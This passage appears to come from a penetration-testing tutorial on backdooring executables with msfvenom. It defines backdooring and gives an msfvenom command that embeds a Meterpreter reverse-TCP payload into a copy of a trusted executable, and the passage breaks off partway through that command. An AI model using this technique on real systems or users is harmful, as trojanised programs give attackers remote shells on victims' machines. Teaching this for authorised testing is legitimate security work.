Backdooring executable files
Backdooring is a method of bypassing normal security validation and maintaining persistent access to the system. The weakest link in any cyber espionage is the human factor. Attackers would typically utilize the latest known or unknown exploit to embed them into the trusted executable and distribute. In this section, we will deep dive into how one can leverage msfvenom
to plant a backdoor in any executable.
msfvenom
is a standalone payload generator using Metasploit msfpayload
and msfencode
. As of June 8, 2015, msfvenom
has replaced msfpayload
. In order to standardize the tool and make it more efficient for the penetration testers, this tool was introduced. It is installed by default in Kali Linux, and when you type msfvenom -h
in the terminal, the following usage details must be displayed:
The following command will create a clone_file.exe
with the reverse_tcp
payload with your IP address:
msfvenom -p windows/meterpreter/reverse_tcp -k -x original_file.exe LHOST...